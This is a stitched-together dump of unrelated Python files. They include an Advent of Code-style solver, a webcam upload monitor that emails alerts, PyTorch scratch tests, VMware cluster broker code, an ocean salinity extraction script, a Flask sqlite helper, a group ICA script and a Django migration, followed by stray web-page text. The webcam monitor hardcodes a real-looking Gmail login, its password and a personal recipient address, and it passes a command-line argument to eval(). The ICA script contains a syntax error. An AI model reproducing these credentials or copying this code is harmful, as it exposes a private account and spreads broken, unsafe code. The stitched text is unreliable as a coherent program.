)
"""
result = connectionDetection.GetConnectionZones(
input
)
# ==============================================================================
# Process output
# ==============================================================================
viewer = App(show_grid=False,width = 3840,height = 2160-250)
DisplayPolylines(viewer,input,0.01,0.5, 0.5, 0.5,1,True)
DisplayPolylines(viewer,result[0],0.01, 1.0, 0.0, 0.0,3,False)
viewer.run()
test_connectionDetection()
|
#!/usr/bin/env python3
# Yes, I am aware that I just switched from 2 spaces to 4 spaces. I installed linux on my desktop and this
# is the default formatting from vim, and also I remembered that it's the preferred tab-width for python.
# I am truly and deeply sorry if this has offended you. If you would like to seek financial compensation
# for this tradgedy, please email me at the address on my github profile, and I'll send you like...
# 5 cents, followed by seeking financial compensation for you seeking financial compensation from me...
import re
import sys
# get some regexes compiled:
node_re = re.compile(r'(\w+) \((\d+)\)')
relationship_re = re.compile(r'(\w+) \((\d+)\) -> (.+)')
if len(sys.argv) > 1:
infilename = sys.argv[1]
else:
infilename = 'input.txt'
parent_nodes = set()
child_nodes = set()
with open(infilename, 'r') as infile:
lines = [line.strip() for line in infile]
for line in lines:
if '->' not in line:
match = node_re.match(line)
child_nodes.add(match.group(1))
elif '->' in line:
match = relationship_re.match(line.strip())
parent_nodes.add(match.group(1))
children = [n.strip() for n in match.group(3).split(',')]
for child in children:
child_nodes.add(child)
print(parent_nodes - child_nodes)
|
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.application import MIMEApplication
import argparse
import schedule
import time
import datetime
import glob
# function to create directories
def create_dir(target_dir):
if not os.path.exists(target_dir):
try:
os.makedirs(target_dir)
except:
pass
# function to write records
def write_record(record_file,output):
with open(record_file,"a") as f:
f.write(output+' \n')
# function to read records
def read_record(record_file):
with open(record_file,"r") as f:
raw_video_ids = f.readlines()
final_video_ids = []
for video_id in raw_video_ids:
final_video_ids.append(video_id.split(" ")[0])
return final_video_ids
# helper function to create day folder
def create_day_folder(base_dir,system_date=None,setup=True):
if system_date == None:
dt_system_date = datetime.datetime.now()
else:
dt_system_date = datetime.datetime.strptime(system_date,'%Y-%m-%d')
year = str(dt_system_date.year)
month = str(dt_system_date.month)
day = str(dt_system_date.day)
day_folder = base_dir + '{}-{}-{}/'.format(year,month,day)
day_string = '{}-{}-{}'.format(year,month,day)
if setup:
create_dir(day_folder)
return day_folder, day_string
def send(user, password, to_list, subject, text, attachment_list=None):
# set up connection
smtp_host = 'smtp.gmail.com'
smtp_port = 587
smtp_connection = smtplib.SMTP(smtp_host,smtp_port) # initiate SMTP connection
smtp_connection.ehlo() # send an EHLO (Extended Hello) command
smtp_connection.starttls() # enable transport layer security (TLS) encryption
smtp_connection.login(user, password) # login
# write email
msg = MIMEMultipart()
msg['Subject'] = subject
msg.attach(MIMEText(text))
# attach files
if attachment_list is not None:
for attachment in attachment_list:
with open(attachment, 'rb') as f:
# Read in the attachment using MIMEApplication
file = MIMEApplication(f.read(),name=os.path.basename(attachment))
file['Content-Disposition'] = f'attachment;filename="{os.path.basename(attachment)}"'
# Add the attachment to our message object
msg.attach(file)
# send
smtp_connection.sendmail(from_addr=user,
to_addrs=to_list, msg=msg.as_string())
# close connection
smtp_connection.quit()
def check_and_record(upload_record,f_cloud_webcam_dir):
# read record file
try:
copied_videos = read_record(upload_record)
except:
write_record(upload_record,'')
copied_videos = read_record(upload_record)
last_record = copied_videos[-1]
if last_record == 'stop':
return False
elif last_record == '':
last_record = 0
next_record = 0.5
else:
last_record = float(last_record)
next_record = len(glob.glob(f_cloud_webcam_dir+'*.mp4'))
write_record(upload_record,str(next_record))
if next_record - last_record > 0:
return False
else:
return True
def check_and_send():
# check if there are any issues for each webcam
for webcam_id in webcam_ids:
webcam_dir = webcam_dirs[webcam_id]
cloud_webcam_dir = cloud_webcam_dirs[webcam_id]
upload_record = webcam_dir + 'email_record.txt'
issue = check_and_record(upload_record,cloud_webcam_dir)
# if not, we send an email
if issue:
send(user='hgselitlab2@gmail.com',
password='litlab2019',
to_list=['chng_weimingedwin@g.harvard.edu'],
subject='No new upload for {}_{}'.format(station_id,webcam_id),
text='',
attachment_list=["{}/hdd_nextcloud_sync.log".format(station_dir)])
write_record(upload_record,'stop')
"""----------------------------- options -----------------------------"""
parser = argparse.ArgumentParser(description='Email')
parser.add_argument('--station', type=int,
help='id for station')
parser.add_argument('--webcams', type=str,
help='list of ids for webcam')
parser.add_argument('--output_dir', type=str, default='../outputs/',
help='location of output drive')
parser.add_argument('--nextcloud_dir', type=str,
help='location of nextcloud drive')
parser.add_argument('--monitor_date', default=None,
help='which date to monitor, %Y-%m-%d')
args = parser.parse_args()
if __name__ == "__main__":
# create necessary variables
code_dir = os.getcwd() +'/'
station_id = args.station
webcam_ids = eval(args.webcams)
monitor_date = args.monitor_date
os.chdir(args.output_dir)
output_dir = os.getcwd() +'/'
os.chdir(args.nextcloud_dir)
nextcloud_dir = os.getcwd() +'/'
print('Next Cloud Directory - {}'.format(nextcloud_dir))
os.chdir(code_dir)
# create folders
station_dir = output_dir + 'station_{}/'.format(station_id)
cloud_day_folder, _ = create_day_folder(nextcloud_dir,system_date=monitor_date,setup=False)
webcam_dirs = {}
cloud_webcam_dirs = {}
for webcam_id in webcam_ids:
camera_id = '{}_{}'.format(station_id,webcam_id)
webcam_dir = station_dir + 'webcam_{}/'.format(webcam_id)
webcam_dirs[webcam_id] = webcam_dir
cloud_webcam_dir = cloud_day_folder + '{}/'.format(camera_id)
cloud_webcam_dirs[webcam_id] = cloud_webcam_dir
# schedule jobs
email_job = schedule.every(90).minutes.do(check_and_send)
# start scheduler
try:
while True:
schedule.run_pending()
time.sleep(1)
except KeyboardInterrupt:
print('\nEnding scheduler...')
|
# coding=utf-8
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import torch
import os
import pickle
import torchvision.models as models
import math
import numpy as np
import cv2
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
# a = torch.randn((1,2,9,9))
# print a
#
# b = torch.nn.functional.adaptive_max_pool2d(a, 3)
# print b
# b = Variable(torch.ones((3,2)), requires_grad=False)
# b[b<0] = 0
# print(b)
# model = torch.load('/home/rgh/PycharmProjects/pytorch-faster-rcnn/data/imagenet_weights/vgg16-00b39a1b.pth')
# print(model.keys())
# model = models.vgg16()
#
# b = torch.ones((3,2))
# c = b[:, 0]
# # c = b.new(b.size(0), 1) #.zero_()
# print(b)
# print(c.size())
# clss = torch.from_numpy(np.array([0,1,2]))
# bbox_targets = clss.new(clss.numel(), 4 * 3).zero_()
# bbox_target_data = torch.from_numpy(np.array([[-1,-2,-3,-4],[-1,-2,-3,-4],[-1,-2,-3,-4]]))
# inds = torch.from_numpy(np.array([1,2]))
#
# clss = clss[inds].contiguous().view(-1,1) # (n, 1)
# print(clss)
# dim1_inds = inds.unsqueeze(1).expand(inds.size(0), 4) # (n, 4) [ [1,1,1,1],[3,3,3,3],[4,4,4,4] ]
# print(dim1_inds)
# dim2_inds = torch.cat([4*clss, 4*clss+1, 4*clss+2, 4*clss+3], 1).long()
# print(dim2_inds)
# bbox_targets[dim1_inds, dim2_inds] = bbox_target_data[inds][:, 0:]
#
# scores = np.array([[1,2],[3,4],[5,6]])
# mask_target_channel = scores.argmax(1)
# print(mask_target_channel.shape)
# img = np.array([0.2,0.5])
# cv2.imwrite('/media/rgh/rgh-data/PycharmProjects/cvpr2018/temp/mask/test.png',img)
# result = np.zeros((3,3))
#
# mask_a = np.array([[1,0],[3,4]])
# index = result[0:2,0:2]==0
# result[0:2,0:2][index] = mask_a[index]
#
# mask_b = np.array([[100,101],[102,103]])
# index = result[0:2,0:2]==0
# result[0:2,0:2][index] = mask_b[index]
# print(result)
# print(bbox_targets)
# a = torch.from_numpy(np.array([[1,2,3],[4,8,6]]))
# b = a[0:1,:]
# print(b)
# b = a.new(2, 1).zero_()
# for i in range(2):
# b[i,:] = a[i,1]
# b[0][0] = 10
# print(a)
# x = np.ones((3,2))
# y = np.ones(3)
# print(x+y)
# overlaps = torch.from_numpy(np.array([[1,2,3],[4,8,6]]))
# gt_boxes = torch.from_numpy(np.array([[0,0,0,0,-1],[0,0,0,0,-2],[0,0,0,0,-3]]))
# max_overlaps, gt_assignment = overlaps.max(1)
# print(max_overlaps,gt_assignment)
# labels = gt_boxes[gt_assignment, [4]]
# print(labels)
# for key, value in dict(model.named_parameters()).items():
# print(key)
# obj2 = pickle.load(open(os.path.join('/home/rgh/PycharmProjects/pytorch-faster-rcnn/output/vgg16/lip_val/global_cat/vgg16_faster_rcnn_iter_70000',
# 'hair_pr.pkl'), 'rb'))
# print(obj2)
# a = torch.ones((256,512,37,39))
#
# b = torch.zeros((256,37,39))
# print(b.size())
# a = Variable(a)
# print(a.size())
# b = Variable(b)
# print(a*b)
# all_boxes = [[[3] for _ in range(2)]
# for _ in range(3)]
# all_boxes[0][0] = 10
# print(all_boxes)
# print(all_boxes[0][0][1])
# img = cv2.imread('/home/rgh/Pictures/temp/t.jpg')
# img = np.array(img)
# img = np.array([img])
# b = torch.from_numpy(img)
# b = b.float()
# b = b.permute(0, 3, 1, 2)
# print(b.size())
# # b has the size (1, 3, 360, 640)
# flow = torch.zeros(1, 420, 1002 , 2)
# b = Variable(b)
# flow = Variable(flow)
# out = F.grid_sample(b, flow)
# print(out.data.shape)
# img = out.data.numpy()
# print(img.shape)
# img = img.squeeze().transpose(1,2,0)
# cv2.imshow('g',img)
# cv2.waitKey()
# grads = {}
# def save_grad(name):
# def hook(grad):
# grads[name] = grad
# return hook
# x = Variable(torch.ones((2,2)), requires_grad=True)
#
# z = x * 2
# z[0,0] = 0
# z.register_hook(save_grad('z'))
# t = z+2
#
# t.backward(torch.Tensor([[10]]))
# print(x.grad,grads['z'])
# x = Variable(torch.ones(2, 2), requires_grad = True)
# w = Variable(torch.ones(2, 2), requires_grad = True)
# z = x*w -100
# loss = z.sum()
# loss.backward() # loss.backward(torch.Tensor([1]))
#
# print(x.grad)
# print(w.grad)
# grads = {}
# def save_grad(name):
# def hook(grad):
# grads[name] = grad
# return hook
#
# x = Variable(torch.ones((2,2)), requires_grad=True)
# y = Variable(torch.ones((1,2)), requires_grad=True)
# t = Variable(torch.ones((1,2)), requires_grad=True)
# t = x[0,:] + y
# t.register_hook(save_grad('t'))
# z = torch.cat((y, t),1)
# z = torch.cat((y, z),1)
# z.backward(torch.Tensor([[1, 2, 3, 4, 1,1]]))
# print(z, x.grad, y.grad, t.grad, grads['t'])
#
# z = x[0,0]
# z.backward(torch.Tensor([[10]]))
# print(z, x.grad, y.grad, t.grad)
# a = torch.ones((3,2))
# a[0,0] = 3
# print(a==3)
# a = np.array([[1,2],[3,4]])
# b = np.zeros((2,2,3))
# mask = a == 1
# c = b[mask]
# c[0][0] = -100
# print (c)
# print (b)
# d = a[mask]
# d [0] = -100
# print (d)
# print (a)
# a = np.array([[1,2],[3,4]])
# mask = a == 1
# b = a[mask]
# b = -100
# print (b)
# print (a)
# a[mask] = -100
# print (a)
# img_names = open('/media/rgh/rgh-data/Dataset/Lip_t_d_zdf/train_full.txt', 'r')
# total = []
# for name in img_names:
# name = name.strip()
# if name not in total:
# total.append(name)
# else:
# print(name)
# print (len(total))
class Vars(object):
def __init__(self):
self.count = 0
self.defs = {}
self.lookup = {}
def add(self, *v):
name = self.lookup.get(v, None)
print (v)
if name is None:
if v[0] == '+':
if v[1] == 0:
return v[2]
elif v[2] == 0:
return v[1]
elif v[0] == '*':
if v[1] == 1:
return v[2]
elif v[2] == 1:
return v[1]
elif v[1] == 0:
return 0
elif v[2] == 0:
return 0
self.count += 1
name = "v" + str(self.count)
self.defs[name] = v
self.lookup[v] = name
return name
def __getitem__(self, name):
return self.defs[name]
def __iter__(self):
return self.defs.iteritems()
def diff(vars, acc, v, w):
if v == w:
return acc
v = vars[v]
if v[0] == 'input':
return 0
elif v[0] == "sin":
return diff(vars, vars.add("*", acc, vars.add("cos", v[1])), v[1], w)
elif v[0] == '+':
gx = diff(vars, acc, v[1], w)
gy = diff(vars, acc, v[2], w)
return vars.add("+", gx, gy)
elif v[0] == '*':
gx = diff(vars, vars.add("*", v[2], acc), v[1], w)
gy = diff(vars, vars.add("*", v[1], acc), v[2], w)
return vars.add("+", gx, gy)
raise NotImplementedError
def autodiff(vars, v, *wrt):
return tuple(diff(vars, 1, v, w) for w in wrt)
# z = (sin x) + (x * y)
vars = Vars()
x = vars.add("input",1)
#a= raw_input()
y = vars.add("input",2)
z = vars.add("+", vars.add("*",x,y),vars.add("sin",x))
a= raw_input()
print (autodiff(vars, z, x, y))
for k, v in vars:
print (k, v)
|
# container-service-extension
# Copyright (c) 2019 VMware, Inc. All Rights Reserved.
# SPDX-License-Identifier: BSD-2-Clause
from container_service_extension.exceptions import ClusterNotFoundError
from container_service_extension.exceptions import CseDuplicateClusterError
from container_service_extension.exceptions import CseServerError
from container_service_extension.exceptions import PksClusterNotFoundError
from container_service_extension.exceptions import PksDuplicateClusterError
from container_service_extension.exceptions import PksServerError
from container_service_extension.logger import SERVER_LOGGER as LOGGER
import container_service_extension.ovdc_utils as ovdc_utils
from container_service_extension.pksbroker import PksBroker
from container_service_extension.pksbroker_manager import create_pks_context_for_all_accounts_in_org # noqa: E501
import container_service_extension.request_handlers.request_utils as req_utils
from container_service_extension.server_constants import K8S_PROVIDER_KEY
from container_service_extension.server_constants import K8sProvider
from container_service_extension.shared_constants import RequestKey
import container_service_extension.utils as utils
from container_service_extension.vcdbroker import VcdBroker
"""Handles retrieving the correct broker/cluster to use during an operation."""
def get_cluster_info(request_data, tenant_auth_token):
"""Get cluster details directly from cloud provider.
Logic of the method is as follows.
If 'ovdc' is present in the cluster spec,
choose the right broker (by identifying the k8s provider
(vcd|pks) defined for that ovdc) to do get_cluster operation.
else
Invoke set of all (vCD/PKS) brokers in the org to find the cluster
:return: a tuple of cluster information as dictionary and the broker
instance used to find the cluster information.
:rtype: tuple
"""
required = [
RequestKey.CLUSTER_NAME
]
req_utils.validate_payload(request_data, required)
org_name = request_data.get(RequestKey.ORG_NAME)
ovdc_name = request_data.get(RequestKey.OVDC_NAME)
if ovdc_name is not None and org_name is not None:
k8s_metadata = \
ovdc_utils.get_ovdc_k8s_provider_metadata(org_name=org_name,
ovdc_name=ovdc_name,
include_credentials=True,
include_nsxt_info=True)
broker = get_broker_from_k8s_metadata(k8s_metadata, tenant_auth_token)
return broker.get_cluster_info(request_data), broker
return get_cluster_and_broker(request_data, tenant_auth_token)
def get_cluster_and_broker(request_data, tenant_auth_token):
cluster_name = request_data[RequestKey.CLUSTER_NAME]
vcd_broker = VcdBroker(tenant_auth_token)
try:
return vcd_broker.get_cluster_info(request_data), vcd_broker
except ClusterNotFoundError as err:
# continue searching using PksBrokers
LOGGER.debug(f"{err}")
except CseDuplicateClusterError as err:
# fail because multiple clusters with same name exist
# only case is when multiple same-name clusters exist across orgs
# and sys admin tries to do a cluster operation
LOGGER.debug(f"{err}")
raise
except Exception as err:
LOGGER.error(f"Unknown error: {err}", exc_info=True)
raise
pks_ctx_list = \
create_pks_context_for_all_accounts_in_org(tenant_auth_token)
for pks_ctx in pks_ctx_list:
debug_msg = f"Get cluster info for cluster '{cluster_name}' " \
f"failed on host '{pks_ctx['host']}' with error: "
pks_broker = PksBroker(pks_ctx, tenant_auth_token)
try:
return pks_broker.get_cluster_info(request_data), pks_broker
except (PksClusterNotFoundError, PksServerError) as err:
# continue searching using other PksBrokers
LOGGER.debug(f"{debug_msg}{err}")
except PksDuplicateClusterError as err:
# fail because multiple clusters with same name exist
LOGGER.debug(f"{debug_msg}{err}")
raise
except Exception as err:
LOGGER.error(f"Unknown error: {err}", exc_info=True)
raise
# only raised if cluster was not found in VcdBroker or PksBrokers
raise ClusterNotFoundError(f"Cluster '{cluster_name}' not found.")
def get_broker_from_k8s_metadata(k8s_metadata, tenant_auth_token):
"""Get broker from ovdc k8s metadata.
If PKS is not enabled, always return VcdBroker
If PKS is enabled
if no ovdc metadata exists or k8s provider is None, raise server error
else return the broker according to ovdc k8s provider
"""
if utils.is_pks_enabled():
if not k8s_metadata or k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.NONE: # noqa: E501
raise CseServerError("Org VDC is not enabled for Kubernetes "
"cluster deployment")
if k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.PKS:
return PksBroker(k8s_metadata, tenant_auth_token)
if k8s_metadata.get(K8S_PROVIDER_KEY) == K8sProvider.NATIVE:
return VcdBroker(tenant_auth_token)
return VcdBroker(tenant_auth_token)
|
"""
A tool to extract hourly time series of salinity and volume in the segments.
Now also gets parts of a variance budget.
Performance: takes 1.5 sec per save (3.6 hours per year) on my mac. This relies
on creating i_dict and j_dict of indices used for fancy indexing in the segment loop.
The alternate version takes about 15 times longer.
"""
# imports
import matplotlib.pyplot as plt
import numpy as np
import pickle
import pandas as pd
import netCDF4 as nc
import argparse
from datetime import datetime, timedelta
import os, sys
sys.path.append(os.path.abspath('../alpha'))
import Lfun
import zrfun
import tef_fun
import flux_fun
from time import time
# get command line arguments
import argparse
parser = argparse.ArgumentParser()
# standard arguments
parser.add_argument('-g', '--gridname', nargs='?', type=str, default='cas6')
parser.add_argument('-t', '--tag', nargs='?', type=str, default='v3')
parser.add_argument('-x', '--ex_name', nargs='?', type=str, default='lo8b')
parser.add_argument('-0', '--date_string0', nargs='?', type=str, default='2019.07.04')
parser.add_argument('-1', '--date_string1', nargs='?', type=str, default='2019.07.04')
args = parser.parse_args()
# Get Ldir
Ldir = Lfun.Lstart(args.gridname, args.tag)
Ldir['gtagex'] = Ldir['gtag'] + '_' + args.ex_name
# get time limits
ds0 = args.date_string0; ds1 = args.date_string1
Ldir['date_string0'] = ds0; Ldir['date_string1'] = ds1
dt0 = datetime.strptime(ds0, '%Y.%m.%d'); dt1 = datetime.strptime(ds1, '%Y.%m.%d')
ndays = (dt1-dt0).days + 1
print('Working on:')
outname = Ldir['gtagex'] + '_' + ds0 + '_' + ds1
print(outname +'\n')
# get list of history files to process
fn_list = Lfun.get_fn_list('hourly', Ldir, ds0, ds1)
NT = len(fn_list)
# get grid info
fn = fn_list[0]
G = zrfun.get_basic_info(fn, only_G=True)
S = zrfun.get_basic_info(fn, only_S=True)
h = G['h']
DA = G['DX'] * G['DY']
DA3 = DA.reshape((1,G['M'],G['L']))
DXu = (G['DX'][:,1:]+G['DX'][:,:-1])/2
DX3u = DXu.reshape((1,G['M'],G['L']-1))
DYv = (G['DY'][1:,:]+G['DY'][:-1,:])/2
DY3v = DYv.reshape((1,G['M']-1,G['L']))
# set input/output location
indir0 = Ldir['LOo'] + 'tef2/'
voldir = indir0 + 'volumes_' + Ldir['gridname'] + '/'
#
outdir0 = indir0 + outname + '/'
Lfun.make_dir(outdir0)
outdir = outdir0 + 'flux/'
Lfun.make_dir(outdir)
# load DataFrame of volume and associated dicts
v_df = pd.read_pickle(voldir + 'volumes.p')
bathy_dict = pickle.load(open(voldir + 'bathy_dict.p', 'rb'))
ji_dict = pickle.load(open(voldir + 'ji_dict.p', 'rb'))
seg_list = list(v_df.index)
testing = False
if testing:
verbose = True
seg_list = seg_list[-2:]
else:
verbose = False
j_dict = {}; i_dict = {}
for seg_name in seg_list:
jj = []; ii = []
ji_list_full = ji_dict[seg_name]
for ji in ji_list_full:
jj.append(ji[0])
ii.append(ji[1])
jjj = np.array(jj)
iii = np.array(ii)
j_dict[seg_name] = jjj
i_dict[seg_name] = iii
s_df = pd.DataFrame(columns=seg_list)
s2_df = pd.DataFrame(columns=seg_list)
mix_df = pd.DataFrame(columns=seg_list)
hmix_df = pd.DataFrame(columns=seg_list)
v_df = pd.DataFrame(columns=seg_list)
for fn in fn_list:
tt0 = time()
print(fn)
ds = nc.Dataset(fn)
salt = ds['salt'][0,:,:,:]
AKs = ds['AKs'][0,:,:,:]
KH = float(ds['nl_tnu2'][0].data)
zeta = ds['zeta'][0,:,:]
ot = ds['ocean_time'][:]
ds.close()
# calculate horizontal salinity gradient for hmix
sx2 = np.square(np.diff(salt,axis=2)/DX3u)
SX2 = 0*salt
SX2[:,:,1:-1] = (sx2[:,:,1:]+sx2[:,:,:-1])/2
sy2 = np.square(np.diff(salt,axis=1)/DY3v)
SY2 = 0*salt
SY2[:,1:-1,:] = (sy2[:,1:,:]+sy2[:,:-1,:])/2
dt = Lfun.modtime_to_datetime(ot.data[0])
# find the volume and volume-mean salinity
for seg_name in seg_list:
jjj = j_dict[seg_name]
iii = i_dict[seg_name]
z_r, z_w = zrfun.get_z(h[jjj,iii], zeta[jjj,iii], S)
dz = np.diff(z_w, axis=0)
dzr = np.diff(z_r, axis=0)
DV = dz * DA3[0,jjj,iii]
DVR = dzr * DA3[0,jjj,iii]
volume = DV.sum()
net_salt = (salt[:,jjj,iii] * DV).sum()
mean_salt = net_salt/volume
net_salt2 = (salt[:,jjj,iii] * salt[:,jjj,iii] * DV).sum()
mean_salt2 = net_salt2/volume
dsdz = (salt[1:,jjj,iii] - salt[:-1,jjj,iii])/dzr
mix = -2*(AKs[1:-1,jjj,iii] * dsdz * dsdz * DVR).sum()
hmix = -2 * KH * ((SX2[:,jjj,iii] + SY2[:,jjj,iii]) * DV).sum()
# store results
s_df.loc[dt, seg_name] = mean_salt
s2_df.loc[dt, seg_name] = mean_salt2
mix_df.loc[dt, seg_name] = mix
hmix_df.loc[dt, seg_name] = hmix
v_df.loc[dt, seg_name] = volume
if verbose:
print('%3s: Mean Salinity = %0.4f, Volume = %0.4f km3' %
(seg_name, mean_salt, volume/1e9))
print('%3s: Mean Salinity Squared = %0.4f, Volume = %0.4f km3' %
(seg_name, mean_salt2, volume/1e9))
print(' ** took %0.1f sec' % (time()-tt0))
sys.stdout.flush()
s_out_fn = outdir + 'hourly_segment_salinity.p'
s2_out_fn = outdir + 'hourly_segment_salinity2.p'
mix_out_fn = outdir + 'hourly_segment_mix.p'
hmix_out_fn = outdir + 'hourly_segment_hmix.p'
v_out_fn = outdir + 'hourly_segment_volume.p'
s_df.to_pickle(s_out_fn)
s2_df.to_pickle(s2_out_fn)
mix_df.to_pickle(mix_out_fn)
hmix_df.to_pickle(hmix_out_fn)
v_df.to_pickle(v_out_fn)
|
import os
import sqlite3
from flask import g, current_app
from collections import namedtuple
import logging
UserEntry = namedtuple('UserEntry', 'user_id,user_name,password')
def init_db():
db = get_db()
try:
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)),
'db.sql')) as f:
sql = f.read() # watch out for built-in `str`
db.executescript(sql)
except sqlite3.OperationalError as oe:
if 'already exists' not in str(oe):
logging.error("Could not found .sql schema, create db with "
"predefined sql schema\nError trace : {0}".
format(str(oe)))
db.execute("""CREATE TABLE users( user_id INTEGER PRIMARY KEY,
user_name text, password text); CREATE TABLE message( id INTEGER
PRIMARY KEY, sender text, receiver text, message text, subject
text, date date, unread INTEGER);""")
db.commit()
def get_db():
if 'db' not in g:
g.db = sqlite3.connect(current_app.config['DATABASE'])
return g.db
def query_db(query, args=(), one=False):
cur = get_db().execute(query, args)
rv = cur.fetchall()
cur.close()
return (rv[0] if rv else None) if one else rv
def del_query_db(query, args=()):
get_db().execute(query, args)
get_db().commit()
|
import argparse
import os
from meshica import migp
from niio import loaded
import numpy as np
import scipy.io as sio
parser = argparse.ArgumentParser()
parser.add_argument('-files',
'--file-list',
help='List of resting-state files to aggregate.',
required=True,
type=str)
parser.add_argument('-c',
'--number-components',
help='Number of ICA components to compute.',
required=False,
type=int,
default=20)
parser.add_argument('-lp',
'--low-pass',
help='Low pass filter frequency.',
required=False,
type=float,
default=None)
parser.add_argument('-tr',
'--rep-time',
help='Repetition time (TR) in seconds.',
required=False,
type=float,
default=0.720)
parser.add_argument('-e',
'--eigens',
help='Number of principcal components to iteratively keep.',
required=False,
type=int,
default=3600)
parser.add_argument('-n',
'--number-subjects',
help='Number of subjects to initialize components with.',
required=False,
type=int,
default=4)
parser.add_argument('-o',
'--output',
help='Output file name for group ICA components.',
required=True,
type=str)
parser.add_argument('-m',
'--mask',
help='Inclusion mask for vertices.',
required=False,
type=str,
default=None)
parser.add_argument('-s',
'--size',
help='Downsample the number of files.',
required=False,
type=int,
default=None)
args = parser.parse_args()
with open(args.file_list, 'r') as f:
files = f.read().split()
np.random.shuffle(files)
if args.size:
files = files[:args.size]
if args.mask:
mask = loaded.load(args.mask)
print('Fitting MIGP with {:} components...'.format(args.number_components))
M = migp.MIGP(n_components=args.number_components,
low_pass=args.low_pass,
m_eigen=args.eigens,
s_init=args.number_subjects,
t_r=args.rep_time,
mask=mask)
M.fit(files)
components = M.components_
if args.mask:
C = np.zeros((mask.shape[0], components.shape[1]))
C[np.where(mask),:] = components)
components = {'components': C}
else:
components = {'components': components}
print('Saving gICA components...')
sio.savemat(file_name=args.output, mdict=components)
|
# Generated by Django 2.1.4 on 2019-09-05 23:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('api', '0002_card'),
]
operations = [
migrations.AlterField(
model_name='card',
name='binNum',
field=models.IntegerField(default=0),
),
migrations.AlterField(
model_name='card',
name='nextReviewAt',
field=models.DateTimeField(blank=True, default=None, null=True),
),
migrations.AlterField(
model_name='card',
name='wrongCount',
field=models.IntegerField(blank=True, default=0),
),
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.